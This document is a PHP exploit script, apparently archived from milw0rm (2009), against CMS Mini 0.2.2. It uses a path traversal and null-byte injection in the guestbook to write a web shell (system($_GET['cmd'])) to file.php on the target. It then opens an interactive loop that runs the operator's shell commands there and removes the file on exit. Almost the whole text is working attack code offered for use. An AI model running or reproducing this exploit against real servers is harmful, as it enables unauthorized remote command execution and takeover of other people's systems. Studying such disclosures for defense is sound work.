1 −−+++================================================================+++−− 2 −−+++====== CMS Mini <= 0.2.2 Remote Command Execution Exploit ======+++−− 3 −−+++================================================================+++−− 4 5 <?php 6 7 function usage () 8 { 9 exit ( 10 "\nCMS Mini <= 0.2.2 Remote Command Execution Exploit". 11 "\n[+] Author : darkjoker". 12 "\n[+] Site : http://darkjoker.net23.net". 13 "\n[+] Download: http://ovh.dl.sourceforge.net/sourceforge/cmsmini/cmsmini−0.2.2.tar.gz". 14 "\n[+] Usage : php xpl.php <hostname> <path>". 15 "\n[+] Ex. : php xpl.php localhost /CMSmini". 16 "\n\n"); 17 } 18 19 if ($argc != 3) 20 usage; 21 $hostname = $argv [1]; 22 $path = $argv [2]; 23 $fp = fsockopen ($hostname, 80); 24 $post = "message=<? system (\$_GET [’cmd’]); die ();?>"; 25 $request = "POST {$path}/view/index.php?op=guestbook&path=..&p=file.php%00 HTTP/1.1\r\n". 26 "Host: $hostname\r\n". 27 "Connection: Close\r\n". 28 "Content−Type: application/x−www−form−urlencoded\r\n". 29 "Content−Length: " . strlen ($post) . "\r\n\r\n". 30 $post; 31 fputs ($fp, $request); 32 fclose ($fp); 33 $stdin = fopen("php://stdin", "r"); 34 while (1) 35 { 36 echo "$ "; 37 $cmd = str_replace (" ", "%20", trim (fgets ($stdin, 1024))); 38 if ($cmd == "exit") 39 { 40 file_get_contents ("http://{$hostname}{$path}/file.php?cmd=rm%20file.php"); 41 break; 42 } 43 echo file_get_contents ("http://{$hostname}{$path}/file.php?cmd={$cmd}"); 44 45 } 46 fclose ($stdin); 47 ?> 48 49 # milw0rm.com [2009−02−02] Page 1/1 CMS Mini 0.2.2 Remote Command Execution Exploit darkjoker 02/02/2009